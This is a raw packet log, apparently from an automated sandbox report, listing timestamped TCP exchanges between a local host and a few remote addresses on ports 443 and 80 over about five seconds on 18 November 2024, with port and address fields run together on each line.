                                                                                                                                          Nov 18, 2024 06:47:28.673389912 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.673614979 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.673676968 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.674220085 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.674277067 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.674504995 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.674565077 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.674984932 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.675045013 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.675271034 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.675333023 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.675668001 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.675733089 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.694027901 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.756551027 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.756640911 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.756702900 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.756722927 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757041931 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757080078 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757082939 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.757090092 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757129908 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.757296085 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757863998 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757925987 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.757932901 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.757967949 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.758013964 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.758022070 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.758760929 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.758817911 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.758825064 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.758912086 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.758963108 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.758970022 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.759063959 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.759099960 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.759108067 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.759609938 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.759690046 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.759696960 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.759879112 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.759917021 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.759922981 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.790003061 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.790117979 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.790417910 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.790481091 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.790730953 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.790791988 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.791047096 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.791100025 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.791382074 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.791439056 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.791469097 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.791502953 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.791527033 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.791544914 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.791572094 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.805054903 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.875488043 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.875545025 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.875575066 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.875588894 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.875607014 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.875652075 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.875695944 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.875705004 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.875750065 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.875921011 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.876221895 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.876271009 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.876281023 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.876286983 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.876339912 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.876724005 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.876785994 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.878175974 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878236055 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.878242016 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878307104 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878362894 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.878369093 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878380060 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878422976 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.878429890 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878854990 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878904104 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.878910065 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.878948927 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.879336119 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.879395008 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.879446983 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.879492044 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.879499912 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.879504919 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.879532099 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.880287886 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.880332947 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.880340099 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.880395889 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.920737028 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.920806885 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.993622065 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.993714094 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.993926048 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.994003057 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.994301081 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.994360924 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.994632006 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.994708061 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.995052099 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.995136023 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.995517969 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.995589972 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.995608091 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.995657921 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.996190071 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.996246099 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.996268034 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.996315002 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.996905088 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.996969938 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997315884 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997386932 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997389078 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997407913 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997433901 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997456074 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997463942 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997526884 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997535944 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997560024 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997612000 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997684002 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997698069 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.997720003 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.997745991 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.000576973 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.000657082 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.000960112 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.001200914 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.001225948 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.219990969 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.220534086 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.220558882 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.221997976 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.222065926 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.222477913 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.222553968 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.222645044 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.222654104 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.235155106 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.235189915 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.235716105 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.236109018 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.236129045 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.267029047 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.332041979 CET4968080192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:29.366041899 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.366358042 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.366425991 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.366643906 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.366759062 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.366821051 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:29.605829954 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.606121063 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.606153011 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.606647968 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.607239008 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.607350111 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.607371092 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.655327082 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.663065910 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.750163078 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.750266075 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.750380993 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.750979900 CET55137443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.751029015 CET44355137104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.840456963 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.840747118 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.840775013 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.841294050 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.841583967 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.841662884 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.841744900 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.886060953 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.886096954 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.983855963 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.983937025 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.984110117 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:29.984172106 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.984750032 CET55138443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:29.984764099 CET44355138104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:30.663491011 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:30.663575888 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:30.663671017 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:30.663885117 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:30.663918018 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.272265911 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.272558928 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.272576094 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.273029089 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.273327112 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.273402929 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.273458958 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.315339088 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.419349909 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.419439077 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.419744968 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.420206070 CET55139443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.420228958 CET44355139104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.423648119 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.423695087 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.423892975 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.424365044 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.424376965 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.467664003 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.467730999 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.468916893 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.469502926 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:31.469521999 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:31.741080046 CET4968080192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:32.030294895 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.030591011 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.030612946 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.030934095 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.031229019 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.031286001 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.031367064 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.074039936 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.074052095 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.090121984 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:32.094259977 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.094536066 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.094567060 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.095025063 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.095530033 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.095612049 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.095664024 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.095664024 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.095706940 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.095838070 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.095875978 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.168015003 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.168090105 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.169410944 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.169765949 CET55140443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.169785976 CET44355140104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.415853024 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.415916920 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.415961981 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.415983915 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.416007042 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.416048050 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.416057110 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.416219950 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.416259050 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.416276932 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.416286945 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.416330099 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.416843891 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.458033085 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.458040953 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.506045103 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.535171032 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535247087 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535278082 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535329103 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.535341024 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535383940 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.535480022 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535768032 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535799026 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535831928 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.535839081 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.535902977 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.536247015 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.536319971 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.536360979 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.536366940 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.536412954 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.536497116 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.536508083 CET44355141104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.536520004 CET55141443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.539288998 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.539380074 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:32.539484978 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.539676905 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:32.539707899 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.135934114 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.136735916 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:33.136782885 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.137110949 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.137408972 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:33.137478113 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.137562990 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:33.179366112 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.192043066 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:33.282697916 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.282768965 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.283680916 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:33.283795118 CET55142443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:33.283808947 CET44355142104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.357985020 CET44349710142.250.186.132192.168.2.16
